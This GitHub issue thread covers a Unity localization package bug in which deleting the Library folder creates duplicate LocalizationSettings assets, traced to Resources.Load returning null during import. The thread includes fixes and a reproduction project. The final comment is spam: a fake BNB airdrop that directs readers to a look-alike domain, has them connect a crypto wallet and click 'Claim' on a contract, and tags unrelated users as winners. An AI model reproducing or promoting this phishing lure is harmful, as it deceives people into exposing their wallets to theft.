### ISSUE TITLE
Multiple LocalizationSettings assets created if Library folder is deleted

### ISSUE THREAD

**Issue by iMobCoding** [ibrahimpenekli/GameToolkit-Localization#20]
So try closing the Unity project. Then delete the Library folder and open the project again. Observe multiple **LocalizationSettings** assets created, in my case it's always original LocalizationSettings + 17 more.

Also there are some errors like:

- [Worker0] CreateSerializedAsset is not supported while importing out-of-process

- [Worker0] UnityException: Creating asset at path Assets/Resources/LocalizationSettings 18.asset failed.

This happens in **Unity v2021.3.21**

The problem is in line 66 of the **LocalizationSettings.cs** because **Resources.Load** returns null while importing assets. So then it goes to the **CreateSettingsAndSave** which saves new assets after delay multiple times...

**Comment by iMobCoding** [comment]
Yes but unfortunately that's a bad way to fix this. I have to find a reason why this is happening. I've discovered that in the empty project (with only localization installed) this doesn't happen. In my project few prefab variants are causing this (that's why it makes 18 settings files for me). I'll keep you posted and if I find it I'll make a PR

**Comment by iMobCoding** [comment]
Ok upon further investigation I found this Unity Issue:
https://issuetracker.unity3d.com/issues/asset-will-return-null-even-if-that-asset-exists-when-calling-resources-dot-load-but-only-for-the-first-time

The problem is this according to their explanation:
_Non scripts can not reliably be loaded from InitializeOnLoad static constructors_

You won't experience this bug in normal circumstances. For me it happened with Odin and Localized Texts inside prefab variants. Every time Library got deleted, new LocalizedSettings were created as many times as there are Localized Texts in prefab variants...

This [PR](https://github.com/ibrahimpenekli/GameToolkit-Localization/pull/21) fixes it

**Comment by iMobCoding** [comment]
@ibrahimpenekli Any news about the PR?

**Comment by ibrahimpenekli** [comment]
Hi @iMobCoding 

I used this Unity function to get active settings:
https://github.com/ibrahimpenekli/GameToolkit-Localization/blob/c0ce6d7beb00c19514791e3fc96a2dff3f1f08ff/Packages/com.gametoolkit.localization/Runtime/LocalizationSettings.cs#L134

So, the settings asset does not need to be located in a specific folder or in the Resources folder.

You can use this bugfix with the [2.2.3](https://github.com/ibrahimpenekli/GameToolkit-Localization/tree/2.2.3) version.
Thanks for your help!

**Comment by iMobCoding** [comment]
Hi @ibrahimpenekli 

Upon further testing of the v2.2.3 I found that it doesn't create new LocalizationSettings indeed, but it bombards the log with multiple worker warnings and errors.

![image](https://user-images.githubusercontent.com/1320690/235300915-6678ad06-94b5-405a-95b1-6654693d03d9.png)

[Log.txt](https://github.com/ibrahimpenekli/GameToolkit-Localization/files/11359059/Log.txt)


![image](https://user-images.githubusercontent.com/1320690/235301215-ffcec8e1-a8e9-496e-bcdb-2952be1445b5.png)

**Comment by ibrahimpenekli** [comment]
That is really strange behaviour.
Which Unity version do you use?
And how to reproduce this issue? Because deleting Library folder does not generate these errors for me.

**Comment by iMobCoding** [comment]
It's the 2021.3.24 Unity, but it happens with lower versions too. I think it doesn't happen with simple localizations but if used inside prefab or prefab variant then it happens. I'll prepare a small reproducible project and send it to you here

**Comment by iMobCoding** [comment]
Ok here is the reproducible project. Once you delete the Library and open the project, click once on **Localization Settings** and then on **Panel - Variant** prefab. You'll see the worker errors. You have to do it  manually in this case as those prefabs aren't referenced in any scripts. In my project, several assets are referenced so when you delete the library folder everything happens automatically on project opening... Let me know if you can reproduce the issue

![image](https://user-images.githubusercontent.com/1320690/235372389-c629408e-bb92-40cd-b6d7-3e20e9e33295.png)

[Localization Test.zip](https://github.com/ibrahimpenekli/GameToolkit-Localization/files/11362146/Localization.Test.zip)

**Edit:** you don't have to delete the whole Library folder every time, delete just the **ArtifactDB** file inside the Library folder and open the project again, it's faster for testing

**Comment by ibrahimpenekli** [comment]
Thanks for the project and detailed explanation. I'll look into that as soon as possible when I have time.

**Comment by chasedson** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @flowmanSF, @denda188, @mateusaka, @michaelbrundage, @ortalby, @ebkaracaa, @dodadoa
